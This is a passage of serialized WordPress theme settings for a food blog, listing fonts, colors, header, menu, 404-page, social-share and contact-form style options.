h4_responsive_font_size\";s:0:\"\";s:25:\"h4_responsive_line_height\";s:0:\"\";s:28:\"h4_responsive_letter_spacing\";s:0:\"\";s:23:\"h5_responsive_font_size\";s:0:\"\";s:25:\"h5_responsive_line_height\";s:0:\"\";s:28:\"h5_responsive_letter_spacing\";s:0:\"\";s:23:\"h6_responsive_font_size\";s:0:\"\";s:25:\"h6_responsive_line_height\";s:0:\"\";s:28:\"h6_responsive_letter_spacing\";s:0:\"\";s:25:\"h1_responsive_font_size_2\";s:0:\"\";s:27:\"h1_responsive_line_height_2\";s:0:\"\";s:30:\"h1_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h2_responsive_font_size_2\";s:0:\"\";s:27:\"h2_responsive_line_height_2\";s:0:\"\";s:30:\"h2_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h3_responsive_font_size_2\";s:0:\"\";s:27:\"h3_responsive_line_height_2\";s:0:\"\";s:30:\"h3_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h4_responsive_font_size_2\";s:0:\"\";s:27:\"h4_responsive_line_height_2\";s:0:\"\";s:30:\"h4_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h5_responsive_font_size_2\";s:0:\"\";s:27:\"h5_responsive_line_height_2\";s:0:\"\";s:30:\"h5_responsive_letter_spacing_2\";s:0:\"\";s:25:\"h6_responsive_font_size_2\";s:0:\"\";s:27:\"h6_responsive_line_height_2\";s:0:\"\";s:30:\"h6_responsive_letter_spacing_2\";s:0:\"\";s:10:\"text_color\";s:0:\"\";s:14:\"text_font_size\";s:0:\"\";s:16:\"text_line_height\";s:0:\"\";s:19:\"text_text_transform\";s:0:\"\";s:17:\"text_google_fonts\";s:2:\"-1\";s:15:\"text_font_style\";s:0:\"\";s:16:\"text_font_weight\";s:0:\"\";s:19:\"text_letter_spacing\";s:0:\"\";s:19:\"text_font_size_res1\";s:0:\"\";s:21:\"text_line_height_res1\";s:0:\"\";s:24:\"text_letter_spacing_res1\";s:0:\"\";s:19:\"text_font_size_res2\";s:0:\"\";s:21:\"text_line_height_res2\";s:0:\"\";s:24:\"text_letter_spacing_res2\";s:0:\"\";s:10:\"link_color\";s:0:\"\";s:15:\"link_hovercolor\";s:0:\"\";s:14:\"link_fontstyle\";s:0:\"\";s:15:\"link_fontweight\";s:0:\"\";s:19:\"link_fontdecoration\";s:0:\"\";s:25:\"link_hover_fontdecoration\";s:0:\"\";s:11:\"header_type\";s:15:\"header-centered\";s:14:\"header_options\";s:0:\"\";s:16:\"header_behaviour\";s:15:\"fixed-on-scroll\";s:12:\"header_style\";s:0:\"\";s:7:\"top_bar\";s:2:\"no\";s:15:\"top_bar_in_grid\";s:3:\"yes\";s:29:\"top_bar_grid_background_color\";s:0:\"\";s:36:\"top_bar_grid_background_transparency\";s:0:\"\";s:24:\"top_bar_background_color\";s:7:\"#ffffff\";s:31:\"top_bar_background_transparency\";s:1:\"0\";s:14:\"top_bar_border\";s:3:\"yes\";s:20:\"top_bar_border_color\";s:0:\"\";s:14:\"top_bar_height\";s:0:\"\";s:20:\"top_bar_side_padding\";s:0:\"\";s:17:\"logo_area_in_grid\";s:2:\"no\";s:26:\"logo_area_background_color\";s:0:\"\";s:33:\"logo_area_background_transparency\";s:0:\"\";s:16:\"logo_area_border\";s:2:\"no\";s:22:\"logo_area_border_color\";s:0:\"\";s:16:\"logo_area_height\";s:0:\"\";s:36:\"logo_wrapper_padding_header_centered\";s:3:\"0px\";s:17:\"menu_area_in_grid\";s:2:\"no\";s:31:\"menu_area_grid_background_color\";s:0:\"\";s:38:\"menu_area_grid_background_transparency\";s:0:\"\";s:24:\"menu_area_in_grid_shadow\";s:2:\"no\";s:24:\"menu_area_in_grid_border\";s:2:\"no\";s:30:\"menu_area_in_grid_border_color\";s:0:\"\";s:26:\"menu_area_background_color\";s:0:\"\";s:33:\"menu_area_background_transparency\";s:0:\"\";s:16:\"menu_area_shadow\";s:2:\"no\";s:16:\"menu_area_border\";s:2:\"no\";s:22:\"menu_area_border_color\";s:0:\"\";s:16:\"menu_area_height\";s:0:\"\";s:22:\"menu_area_side_padding\";s:0:\"\";s:31:\"fullscreen_menu_animation_style\";s:20:\"fade-push-text-right\";s:18:\"fullscreen_in_grid\";s:2:\"no\";s:20:\"fullscreen_alignment\";s:0:\"\";s:32:\"fullscreen_menu_background_color\";s:0:\"\";s:39:\"fullscreen_menu_background_transparency\";s:0:\"\";s:32:\"fullscreen_menu_background_image\";s:0:\"\";s:29:\"fullscreen_menu_pattern_image\";s:0:\"\";s:21:\"fullscreen_menu_color\";s:0:\"\";s:27:\"fullscreen_menu_hover_color\";s:0:\"\";s:28:\"fullscreen_menu_active_color\";s:0:\"\";s:28:\"fullscreen_menu_google_fonts\";s:2:\"-1\";s:25:\"fullscreen_menu_font_size\";s:0:\"\";s:27:\"fullscreen_menu_line_height\";s:0:\"\";s:26:\"fullscreen_menu_font_style\";s:0:\"\";s:27:\"fullscreen_menu_font_weight\";s:0:\"\";s:30:\"fullscreen_menu_letter_spacing\";s:0:\"\";s:30:\"fullscreen_menu_text_transform\";s:0:\"\";s:25:\"fullscreen_menu_color_2nd\";s:0:\"\";s:31:\"fullscreen_menu_hover_color_2nd\";s:0:\"\";s:32:\"fullscreen_menu_google_fonts_2nd\";s:2:\"-1\";s:29:\"fullscreen_menu_font_size_2nd\";s:0:\"\";s:31:\"fullscreen_menu_line_height_2nd\";s:0:\"\";s:30:\"fullscreen_menu_font_style_2nd\";s:0:\"\";s:31:\"fullscreen_menu_font_weight_2nd\";s:0:\"\";s:34:\"fullscreen_menu_letter_spacing_2nd\";s:0:\"\";s:34:\"fullscreen_menu_text_transform_2nd\";s:0:\"\";s:25:\"fullscreen_menu_color_3rd\";s:0:\"\";s:31:\"fullscreen_menu_hover_color_3rd\";s:0:\"\";s:32:\"fullscreen_menu_google_fonts_3rd\";s:2:\"-1\";s:29:\"fullscreen_menu_font_size_3rd\";s:0:\"\";s:31:\"fullscreen_menu_line_height_3rd\";s:0:\"\";s:30:\"fullscreen_menu_font_style_3rd\";s:0:\"\";s:31:\"fullscreen_menu_font_weight_3rd\";s:0:\"\";s:34:\"fullscreen_menu_letter_spacing_3rd\";s:0:\"\";s:34:\"fullscreen_menu_text_transform_3rd\";s:0:\"\";s:26:\"fullscreen_menu_icon_color\";s:0:\"\";s:32:\"fullscreen_menu_icon_hover_color\";s:0:\"\";s:33:\"fullscreen_menu_icon_mobile_color\";s:0:\"\";s:39:\"fullscreen_menu_icon_mobile_hover_color\";s:0:\"\";s:22:\"set_menu_area_position\";s:5:\"right\";s:32:\"vertical_header_background_color\";s:0:\"\";s:32:\"vertical_header_background_image\";s:0:\"\";s:22:\"vertical_header_shadow\";s:2:\"no\";s:22:\"vertical_header_border\";s:2:\"no\";s:28:\"vertical_header_border_color\";s:0:\"\";s:30:\"vertical_header_center_content\";s:2:\"no\";s:24:\"scroll_amount_for_sticky\";s:0:\"\";s:21:\"sticky_header_in_grid\";s:2:\"no\";s:30:\"sticky_header_background_color\";s:0:\"\";s:26:\"sticky_header_transparency\";s:0:\"\";s:26:\"sticky_header_border_color\";s:0:\"\";s:20:\"sticky_header_height\";s:0:\"\";s:26:\"sticky_header_side_padding\";s:0:\"\";s:12:\"sticky_color\";s:0:\"\";s:17:\"sticky_hovercolor\";s:0:\"\";s:19:\"sticky_google_fonts\";s:2:\"-1\";s:16:\"sticky_font_size\";s:0:\"\";s:18:\"sticky_line_height\";s:0:\"\";s:21:\"sticky_text_transform\";s:0:\"\";s:17:\"sticky_font_style\";s:0:\"\";s:18:\"sticky_font_weight\";s:0:\"\";s:21:\"sticky_letter_spacing\";s:0:\"\";s:29:\"fixed_header_background_color\";s:0:\"\";s:25:\"fixed_header_transparency\";s:0:\"\";s:32:\"fixed_header_border_bottom_color\";s:0:\"\";s:11:\"fixed_color\";s:0:\"\";s:16:\"fixed_hovercolor\";s:0:\"\";s:18:\"fixed_google_fonts\";s:2:\"-1\";s:15:\"fixed_font_size\";s:0:\"\";s:17:\"fixed_line_height\";s:0:\"\";s:20:\"fixed_text_transform\";s:0:\"\";s:16:\"fixed_font_style\";s:0:\"\";s:17:\"fixed_font_weight\";s:0:\"\";s:20:\"fixed_letter_spacing\";s:0:\"\";s:25:\"dropdown_background_color\";s:0:\"\";s:32:\"dropdown_background_transparency\";s:0:\"\";s:24:\"menu_dropdown_appearance\";s:23:\"dropdown-animate-height\";s:21:\"dropdown_top_position\";s:0:\"\";s:10:\"menu_color\";s:0:\"\";s:15:\"menu_hovercolor\";s:0:\"\";s:16:\"menu_activecolor\";s:0:\"\";s:21:\"menu_light_hovercolor\";s:0:\"\";s:22:\"menu_light_activecolor\";s:0:\"\";s:20:\"menu_dark_hovercolor\";s:0:\"\";s:21:\"menu_dark_activecolor\";s:0:\"\";s:17:\"menu_google_fonts\";s:2:\"-1\";s:14:\"menu_font_size\";s:0:\"\";s:16:\"menu_line_height\";s:0:\"\";s:15:\"menu_font_style\";s:0:\"\";s:16:\"menu_font_weight\";s:0:\"\";s:19:\"menu_letter_spacing\";s:0:\"\";s:19:\"menu_text_transform\";s:0:\"\";s:23:\"menu_padding_left_right\";s:0:\"\";s:22:\"menu_margin_left_right\";s:0:\"\";s:14:\"dropdown_color\";s:0:\"\";s:19:\"dropdown_hovercolor\";s:0:\"\";s:21:\"dropdown_google_fonts\";s:2:\"-1\";s:18:\"dropdown_font_size\";s:0:\"\";s:20:\"dropdown_line_height\";s:0:\"\";s:19:\"dropdown_font_style\";s:0:\"\";s:20:\"dropdown_font_weight\";s:0:\"\";s:23:\"dropdown_letter_spacing\";s:0:\"\";s:23:\"dropdown_text_transform\";s:0:\"\";s:19:\"dropdown_wide_color\";s:0:\"\";s:24:\"dropdown_wide_hovercolor\";s:0:\"\";s:26:\"dropdown_wide_google_fonts\";s:2:\"-1\";s:23:\"dropdown_wide_font_size\";s:0:\"\";s:25:\"dropdown_wide_line_height\";s:0:\"\";s:24:\"dropdown_wide_font_style\";s:0:\"\";s:25:\"dropdown_wide_font_weight\";s:0:\"\";s:28:\"dropdown_wide_letter_spacing\";s:0:\"\";s:28:\"dropdown_wide_text_transform\";s:0:\"\";s:23:\"dropdown_color_thirdlvl\";s:0:\"\";s:28:\"dropdown_hovercolor_thirdlvl\";s:0:\"\";s:30:\"dropdown_google_fonts_thirdlvl\";s:2:\"-1\";s:27:\"dropdown_font_size_thirdlvl\";s:0:\"\";s:29:\"dropdown_line_height_thirdlvl\";s:0:\"\";s:28:\"dropdown_font_style_thirdlvl\";s:0:\"\";s:29:\"dropdown_font_weight_thirdlvl\";s:0:\"\";s:32:\"dropdown_letter_spacing_thirdlvl\";s:0:\"\";s:32:\"dropdown_text_transform_thirdlvl\";s:0:\"\";s:28:\"dropdown_wide_color_thirdlvl\";s:0:\"\";s:33:\"dropdown_wide_hovercolor_thirdlvl\";s:0:\"\";s:35:\"dropdown_wide_google_fonts_thirdlvl\";s:2:\"-1\";s:32:\"dropdown_wide_font_size_thirdlvl\";s:0:\"\";s:34:\"dropdown_wide_line_height_thirdlvl\";s:0:\"\";s:33:\"dropdown_wide_font_style_thirdlvl\";s:0:\"\";s:34:\"dropdown_wide_font_weight_thirdlvl\";s:0:\"\";s:37:\"dropdown_wide_letter_spacing_thirdlvl\";s:0:\"\";s:37:\"dropdown_wide_text_transform_thirdlvl\";s:0:\"\";s:24:\"vertical_menu_top_margin\";s:0:\"\";s:27:\"vertical_menu_bottom_margin\";s:0:\"\";s:23:\"vertical_menu_1st_color\";s:0:\"\";s:29:\"vertical_menu_1st_hover_color\";s:0:\"\";s:27:\"vertical_menu_1st_font_size\";s:0:\"\";s:29:\"vertical_menu_1st_line_height\";s:0:\"\";s:32:\"vertical_menu_1st_text_transform\";s:0:\"\";s:30:\"vertical_menu_1st_google_fonts\";s:2:\"-1\";s:28:\"vertical_menu_1st_font_style\";s:0:\"\";s:29:\"vertical_menu_1st_font_weight\";s:0:\"\";s:32:\"vertical_menu_1st_letter_spacing\";s:0:\"\";s:23:\"vertical_menu_2nd_color\";s:0:\"\";s:29:\"vertical_menu_2nd_hover_color\";s:0:\"\";s:27:\"vertical_menu_2nd_font_size\";s:0:\"\";s:29:\"vertical_menu_2nd_line_height\";s:0:\"\";s:32:\"vertical_menu_2nd_text_transform\";s:0:\"\";s:30:\"vertical_menu_2nd_google_fonts\";s:2:\"-1\";s:28:\"vertical_menu_2nd_font_style\";s:0:\"\";s:29:\"vertical_menu_2nd_font_weight\";s:0:\"\";s:32:\"vertical_menu_2nd_letter_spacing\";s:0:\"\";s:23:\"vertical_menu_3rd_color\";s:0:\"\";s:29:\"vertical_menu_3rd_hover_color\";s:0:\"\";s:27:\"vertical_menu_3rd_font_size\";s:0:\"\";s:29:\"vertical_menu_3rd_line_height\";s:0:\"\";s:32:\"vertical_menu_3rd_text_transform\";s:0:\"\";s:30:\"vertical_menu_3rd_google_fonts\";s:2:\"-1\";s:28:\"vertical_menu_3rd_font_style\";s:0:\"\";s:29:\"vertical_menu_3rd_font_weight\";s:0:\"\";s:32:\"vertical_menu_3rd_letter_spacing\";s:0:\"\";s:20:\"mobile_header_height\";s:0:\"\";s:30:\"mobile_header_background_color\";s:0:\"\";s:33:\"mobile_header_border_bottom_color\";s:0:\"\";s:28:\"mobile_menu_background_color\";s:0:\"\";s:31:\"mobile_menu_border_bottom_color\";s:0:\"\";s:27:\"mobile_menu_separator_color\";s:0:\"\";s:18:\"mobile_logo_height\";s:0:\"\";s:25:\"mobile_logo_height_phones\";s:0:\"\";s:17:\"mobile_text_color\";s:0:\"\";s:23:\"mobile_text_hover_color\";s:0:\"\";s:24:\"mobile_text_google_fonts\";s:0:\"\";s:21:\"mobile_text_font_size\";s:0:\"\";s:23:\"mobile_text_line_height\";s:0:\"\";s:26:\"mobile_text_text_transform\";s:0:\"\";s:22:\"mobile_text_font_style\";s:0:\"\";s:23:\"mobile_text_font_weight\";s:0:\"\";s:26:\"mobile_text_letter_spacing\";s:0:\"\";s:26:\"mobile_dropdown_text_color\";s:0:\"\";s:32:\"mobile_dropdown_text_hover_color\";s:0:\"\";s:33:\"mobile_dropdown_text_google_fonts\";s:0:\"\";s:30:\"mobile_dropdown_text_font_size\";s:0:\"\";s:32:\"mobile_dropdown_text_line_height\";s:0:\"\";s:35:\"mobile_dropdown_text_text_transform\";s:0:\"\";s:31:\"mobile_dropdown_text_font_style\";s:0:\"\";s:32:\"mobile_dropdown_text_font_weight\";s:0:\"\";s:35:\"mobile_dropdown_text_letter_spacing\";s:0:\"\";s:17:\"mobile_menu_title\";s:0:\"\";s:17:\"mobile_icon_color\";s:0:\"\";s:23:\"mobile_icon_hover_color\";s:0:\"\";s:15:\"show_title_area\";s:3:\"yes\";s:15:\"title_area_type\";s:11:\"breadcrumbs\";s:18:\"title_area_in_grid\";s:3:\"yes\";s:17:\"title_area_height\";s:0:\"\";s:27:\"title_area_background_color\";s:7:\"#ffb39c\";s:27:\"title_area_background_image\";s:0:\"\";s:36:\"title_area_background_image_behavior\";s:0:\"\";s:29:\"title_area_vertical_alignment\";s:13:\"header-bottom\";s:20:\"title_area_title_tag\";s:2:\"h2\";s:16:\"page_title_color\";s:0:\"\";s:20:\"page_title_font_size\";s:0:\"\";s:22:\"page_title_line_height\";s:0:\"\";s:25:\"page_title_text_transform\";s:0:\"\";s:23:\"page_title_google_fonts\";s:2:\"-1\";s:21:\"page_title_font_style\";s:0:\"\";s:22:\"page_title_font_weight\";s:0:\"\";s:25:\"page_title_letter_spacing\";s:0:\"\";s:23:\"title_area_subtitle_tag\";s:2:\"h6\";s:19:\"page_subtitle_color\";s:0:\"\";s:23:\"page_subtitle_font_size\";s:0:\"\";s:25:\"page_subtitle_line_height\";s:0:\"\";s:28:\"page_subtitle_text_transform\";s:0:\"\";s:26:\"page_subtitle_google_fonts\";s:2:\"-1\";s:24:\"page_subtitle_font_style\";s:0:\"\";s:25:\"page_subtitle_font_weight\";s:0:\"\";s:28:\"page_subtitle_letter_spacing\";s:0:\"\";s:21:\"page_breadcrumb_color\";s:0:\"\";s:25:\"page_breadcrumb_font_size\";s:0:\"\";s:27:\"page_breadcrumb_line_height\";s:0:\"\";s:30:\"page_breadcrumb_text_transform\";s:0:\"\";s:28:\"page_breadcrumb_google_fonts\";s:2:\"-1\";s:26:\"page_breadcrumb_font_style\";s:0:\"\";s:27:\"page_breadcrumb_font_weight\";s:0:\"\";s:30:\"page_breadcrumb_letter_spacing\";s:0:\"\";s:26:\"page_breadcrumb_hovercolor\";s:0:\"\";s:18:\"page_show_comments\";s:3:\"yes\";s:19:\"content_top_padding\";s:0:\"\";s:27:\"content_top_padding_in_grid\";s:0:\"\";s:26:\"content_top_padding_mobile\";s:0:\"\";s:26:\"enable_content_bottom_area\";s:2:\"no\";s:37:\"content_bottom_sidebar_custom_display\";s:0:\"\";s:22:\"content_bottom_in_grid\";s:3:\"yes\";s:31:\"content_bottom_background_color\";s:0:\"\";s:14:\"sidebar_layout\";s:16:\"sidebar-25-right\";s:19:\"custom_sidebar_area\";s:0:\"\";s:14:\"footer_in_grid\";s:2:\"no\";s:17:\"uncovering_footer\";s:3:\"yes\";s:15:\"show_footer_top\";s:3:\"yes\";s:18:\"footer_top_columns\";s:1:\"3\";s:28:\"footer_top_columns_alignment\";s:4:\"left\";s:27:\"footer_top_background_color\";s:0:\"\";s:18:\"show_footer_bottom\";s:3:\"yes\";s:21:\"footer_bottom_columns\";s:1:\"1\";s:30:\"footer_bottom_background_color\";s:0:\"\";s:14:\"blog_list_type\";s:8:\"standard\";s:22:\"archive_sidebar_layout\";s:16:\"sidebar-33-right\";s:27:\"archive_custom_sidebar_area\";s:4:\"team\";s:19:\"blog_masonry_layout\";s:7:\"in-grid\";s:30:\"blog_masonry_number_of_columns\";s:4:\"five\";s:32:\"blog_masonry_space_between_items\";s:6:\"normal\";s:35:\"blog_list_featured_image_proportion\";s:5:\"fixed\";s:20:\"blog_pagination_type\";s:15:\"infinite-scroll\";s:15:\"number_of_chars\";s:2:\"60\";s:26:\"blog_single_sidebar_layout\";s:16:\"sidebar-25-right\";s:31:\"blog_single_custom_sidebar_area\";s:0:\"\";s:20:\"show_title_area_blog\";s:3:\"yes\";s:31:\"blog_single_title_in_title_area\";s:3:\"yes\";s:25:\"blog_single_related_posts\";s:3:\"yes\";s:20:\"blog_single_comments\";s:3:\"yes\";s:22:\"blog_single_navigation\";s:3:\"yes\";s:37:\"blog_navigation_through_same_category\";s:2:\"no\";s:16:\"blog_author_info\";s:3:\"yes\";s:22:\"blog_author_info_email\";s:2:\"no\";s:25:\"blog_single_author_social\";s:3:\"yes\";s:33:\"portfolio_archive_number_of_items\";s:0:\"\";s:35:\"portfolio_archive_number_of_columns\";s:1:\"4\";s:37:\"portfolio_archive_space_between_items\";s:6:\"normal\";s:28:\"portfolio_archive_image_size\";s:9:\"landscape\";s:29:\"portfolio_archive_item_layout\";s:15:\"standard-shader\";s:25:\"portfolio_single_template\";s:12:\"small-images\";s:39:\"portfolio_single_gallery_columns_number\";s:5:\"three\";s:44:\"portfolio_single_gallery_space_between_items\";s:6:\"normal\";s:39:\"portfolio_single_masonry_columns_number\";s:5:\"three\";s:44:\"portfolio_single_masonry_space_between_items\";s:6:\"normal\";s:32:\"show_title_area_portfolio_single\";s:0:\"\";s:32:\"portfolio_single_lightbox_images\";s:3:\"yes\";s:32:\"portfolio_single_lightbox_videos\";s:2:\"no\";s:34:\"portfolio_single_enable_categories\";s:3:\"yes\";s:26:\"portfolio_single_hide_date\";s:3:\"yes\";s:31:\"portfolio_single_sticky_sidebar\";s:3:\"yes\";s:25:\"portfolio_single_comments\";s:2:\"no\";s:32:\"portfolio_single_hide_pagination\";s:2:\"no\";s:34:\"portfolio_single_nav_same_category\";s:2:\"no\";s:21:\"portfolio_single_slug\";s:0:\"\";s:20:\"side_area_icon_color\";s:0:\"\";s:26:\"side_area_icon_hover_color\";s:0:\"\";s:26:\"side_area_close_icon_color\";s:0:\"\";s:32:\"side_area_close_icon_hover_color\";s:0:\"\";s:15:\"side_area_width\";s:0:\"\";s:26:\"side_area_background_color\";s:0:\"\";s:17:\"side_area_padding\";s:0:\"\";s:18:\"side_area_aligment\";s:0:\"\";s:18:\"search_page_layout\";s:7:\"in-grid\";s:26:\"search_page_sidebar_layout\";s:10:\"no-sidebar\";s:26:\"search_custom_sidebar_area\";s:0:\"\";s:16:\"search_icon_pack\";s:12:\"font_elegant\";s:11:\"search_logo\";s:71:\"http://tummyrevolution.com/wp-content/uploads/2018/02/search-logo-1.png\";s:22:\"search_sidebar_columns\";s:1:\"3\";s:14:\"search_in_grid\";s:3:\"yes\";s:23:\"header_search_icon_size\";s:0:\"\";s:24:\"header_search_icon_color\";s:0:\"\";s:30:\"header_search_icon_hover_color\";s:0:\"\";s:23:\"enable_search_icon_text\";s:2:\"no\";s:22:\"search_icon_text_color\";s:0:\"\";s:28:\"search_icon_text_color_hover\";s:0:\"\";s:26:\"search_icon_text_font_size\";s:0:\"\";s:28:\"search_icon_text_line_height\";s:0:\"\";s:31:\"search_icon_text_text_transform\";s:0:\"\";s:29:\"search_icon_text_google_fonts\";s:2:\"-1\";s:27:\"search_icon_text_font_style\";s:0:\"\";s:28:\"search_icon_text_font_weight\";s:0:\"\";s:31:\"search_icon_text_letter_spacing\";s:0:\"\";s:19:\"enable_social_share\";s:3:\"yes\";s:27:\"enable_social_share_on_post\";s:3:\"yes\";s:27:\"enable_social_share_on_page\";s:2:\"no\";s:37:\"enable_social_share_on_portfolio-item\";s:3:\"yes\";s:21:\"enable_facebook_share\";s:3:\"yes\";s:13:\"facebook_icon\";s:86:\"http://tummyrevolution.com/wp-content/uploads/2020/04/facebook-icon-e1587088908786.png\";s:20:\"enable_twitter_share\";s:3:\"yes\";s:12:\"twitter_icon\";s:85:\"http://tummyrevolution.com/wp-content/uploads/2020/04/twitter-icon-e1587088942167.png\";s:11:\"twitter_via\";s:35:\"https://twitter.com/tummyrevolution\";s:24:\"enable_google_plus_share\";s:2:\"no\";s:16:\"google_plus_icon\";s:0:\"\";s:21:\"enable_linkedin_share\";s:3:\"yes\";s:13:\"linkedin_icon\";s:87:\"http://tummyrevolution.com/wp-content/uploads/2020/04/linked-in-icon-e1587088976227.png\";s:19:\"enable_tumblr_share\";s:3:\"yes\";s:11:\"tumblr_icon\";s:79:\"http://tummyrevolution.com/wp-content/uploads/2020/04/tumblr-e1587089403117.png\";s:22:\"enable_pinterest_share\";s:3:\"yes\";s:14:\"pinterest_icon\";s:87:\"http://tummyrevolution.com/wp-content/uploads/2020/04/Pinterest-icon-e1587089358407.png\";s:15:\"enable_vk_share\";s:2:\"no\";s:7:\"vk_icon\";s:0:\"\";s:17:\"enable_open_graph\";s:2:\"no\";s:16:\"open_graph_image\";s:81:\"http://tummyrevolution.com/wp-content/themes/succulents/assets/img/open_graph.jpg\";s:37:\"404_logo_area_background_color_header\";s:7:\"#ffffff\";s:44:\"404_logo_area_background_transparency_header\";s:1:\"0\";s:37:\"404_menu_area_background_color_header\";s:7:\"#ffffff\";s:44:\"404_menu_area_background_transparency_header\";s:1:\"0\";s:33:\"404_menu_area_border_color_header\";s:0:\"\";s:16:\"404_header_style\";s:0:\"\";s:25:\"404_page_background_color\";s:7:\"#ffffff\";s:25:\"404_page_background_image\";s:67:\"http://tummyrevolution.com/wp-content/uploads/2018/01/404-img-1.jpg\";s:33:\"404_page_background_pattern_image\";s:0:\"\";s:20:\"404_page_title_image\";s:71:\"http://tummyrevolution.com/wp-content/uploads/2018/01/404-title-img.png\";s:9:\"404_title\";s:19:\"Sweet & healty food\";s:15:\"404_title_color\";s:7:\"#3c3c3c\";s:22:\"404_title_google_fonts\";s:9:\"Quicksand\";s:19:\"404_title_font_size\";s:2:\"14\";s:21:\"404_title_line_height\";s:2:\"40\";s:20:\"404_title_font_style\";s:0:\"\";s:21:\"404_title_font_weight\";s:3:\"500\";s:24:\"404_title_letter_spacing\";s:1:\"3\";s:24:\"404_title_text_transform\";s:9:\"uppercase\";s:12:\"404_subtitle\";s:14:\"404 Error Page\";s:18:\"404_subtitle_color\";s:7:\"#3c3c3c\";s:25:\"404_subtitle_google_fonts\";s:9:\"Quicksand\";s:22:\"404_subtitle_font_size\";s:2:\"60\";s:24:\"404_subtitle_line_height\";s:2:\"60\";s:23:\"404_subtitle_font_style\";s:0:\"\";s:24:\"404_subtitle_font_weight\";s:3:\"700\";s:27:\"404_subtitle_letter_spacing\";s:0:\"\";s:27:\"404_subtitle_text_transform\";s:0:\"\";s:8:\"404_text\";s:145:\"The page you are looking for does not exist. Perhaps you can return back to the site\'s homepage and see if you can find what you are looking for.\";s:14:\"404_text_color\";s:0:\"\";s:21:\"404_text_google_fonts\";s:2:\"-1\";s:18:\"404_text_font_size\";s:2:\"18\";s:20:\"404_text_line_height\";s:2:\"25\";s:19:\"404_text_font_style\";s:0:\"\";s:20:\"404_text_font_weight\";s:3:\"400\";s:23:\"404_text_letter_spacing\";s:0:\"\";s:23:\"404_text_text_transform\";s:0:\"\";s:22:\"cf7_style_1_text_color\";s:0:\"\";s:28:\"cf7_style_1_focus_text_color\";s:0:\"\";s:26:\"cf7_style_1_text_font_size\";s:2:\"16\";s:28:\"cf7_style_1_text_line_height\";s:0:\"\";s:29:\"cf7_style_1_text_google_fonts\";s:7:\"PT+Sans\";s:27:\"cf7_style_1_text_font_style\";s:0:\"\";s:28:\"cf7_style_1_text_font_weight\";s:0:\"\";s:31:\"cf7_style_1_text_text_transform\";s:0:\"\";s:31:\"cf7_style_1_text_letter_spacing\";s:0:\"\";s:23:\"cf7_style_1_label_color\";s:0:\"\";s:27:\"cf7_style_1_label_font_size\";s:0:\"\";s:29:\"cf7_style_1_label_line_height\";s:0:\"\";s:30:\"cf7_style_1_label_google_fonts\";s:9:\"Quicksand\";s:28:\"cf7_style_1_label_font_style\";s:0:\"\";s:29:\"cf7_style_1_label_font_weight\";s:0:\"\";s:32:\"cf7_style_1_label_text_transform\";s:0:\"\";s:32:\"cf7_style_1_label_letter_spacing\";s:0:\"\";s:28:\"cf7_style_1_background_color\";s:0:\"\";s:35:\"cf7_style_1_background_transparency\";s:0:\"\";s:34:\"cf7_style_1_focus_background_color\";s:0:\"\";s:41:\"cf7_style_1_focus_background_transparency\";s:0:\"\";s:24:\"cf7_style_1_border_color\";s:0:\"\";s:31:\"cf7_style_1_border_transparency\";s:0:\"\";s:30:\"cf7_style_1_focus_border_color\";s:0:\"\";s:37:\"cf7_style_1_focus_border_transparency\";s:0:\"\";s:24:\"cf7_style_1_border_width\";s:0:\"\";s:25:\"cf7_style_1_border_radius\";s:0:\"\";s:23:\"cf7_style_1_padding_top\";s:0:\"\";s:25:\"cf7_style_1_padding_right\";s:0:\"\";s:26:\"cf7_style_1_padding_bottom\";s:0:\"\";s:24:\"cf7_style_1_padding_left\";s:0:\"\";s:22:\"cf7_style_1_margin_top\";s:0:\"\";s:25:\"cf7_style_1_margin_bottom\";s:0:\"\";s:27:\"cf7_style_1_textarea_height\";s:0:\"\";s:24:\"cf7_style_1_button_color\";s:0:\"\";s:30:\"cf7_style_1_button_hover_color\";s:0:\"\";s:28:\"cf7_style_1_button_font_size\";s:0:\"\";s:31:\"cf7_style_1_button_google_fonts\";s:2:\"-1\";s:29:\"cf7_style_1_button_font_style\";s:0:\"\";s:30:\"cf7_style_1_button_font_weight\";s:0:\"\";s:33:\"cf7_style_1_button_text_transform\";s:0:\"\";s:33:\"cf7_style_1_button_letter_spacing\";s:0:\"\";s:35:\"cf7_style_1_button_background_color\";s:0:\"\";s:42:\"cf7_style_1_button_background_transparency\";s:0:\"\";s:35:\"cf7_style_1_button_hover_bckg_color\";s:0:\"\";s:42:\"cf7_style_1_button_hover_bckg_transparency\";s:0:\"\";s:31:\"cf7_style_1_button_border_color\";s:0:\"\";s:38:\"cf7_style_1_button_border_transparency\";s:0:\"\";s:37:\"cf7_style_1_button_hover_border_color\";s:0:\"\";s:44:\"cf7_style_1_button_hover_border_transparency\";s:0:\"\";s:31:\"cf7_style_1_button_border_width\";s:0:\"\";s:32:\"cf7_style_1_button_border_radius\";s:0:\"\";s:25:\"cf7_style_1_button_height\";s:0:\"\";s:26:\"cf7_style_1_button_padding\";s:0:\"\";s:22:\"cf7_style_2_text_color\";s:0:\"\";s:28:\"cf7_style_2_focus_text_color\";s:0:\"\";s:26:\"cf7_style_2_text_font_size\";s:0:\"\";s:28:\"cf7_style_2_text_line_height\";s:0:\"\";s:29:\"cf7_style_2_text_google_fonts\";s:7:\"PT+Sans\";s:27:\"cf7_style_2_text_font_style\";s:0:\"\";s:28:\"cf7_style_2_text_font_weight\";s:0:\"\";s:31:\"cf7_style_2_text_text_transform\";s:0:\"\";s:31:\"cf7_style_2_text_letter_spacing\";s:0:\"\";s:23:\"cf7_style_2_label_color\";s:0:\"\";s:27:\"cf7_style_2_label_font_size\";s:0:\"\";s:29:\"cf7_style_2_label_line_height\";s:0:\"\";s:30:\"cf7_style_2_label_google_fonts\";s:2:\"-1\";s:28:\"cf7_style_2_label_font_style\";s:0:\"\";s:29:\"cf7_style_2_label_font_weight\";s:0:\"\";s:32:\"cf7_style_2_label_text_transform\";s:0:\"\";s:32:\"cf7_style_2_label_letter_spacing\";s:0:\"\";s:28:\"cf7_style_2_background_color\";s:0:\"\";s:35:\"cf7_style_2_background_transparency\";s:0:\"\";s:34:\"cf7_style_2_focus_background_color\";s:0:\"\";s:41:\"cf7_style_2_focus_background_transparency\";s:0:\"\";s:24:\"cf7_style_2_border_color\";s:0:\"\";s:31:\"cf7_style_2_border_transparency\";s:0:\"\";s:30:\"cf7_style_2_focus_border_color\";s:0:\"\";s:37:\"cf7_style_2_focus_border_transparency\";s:0:\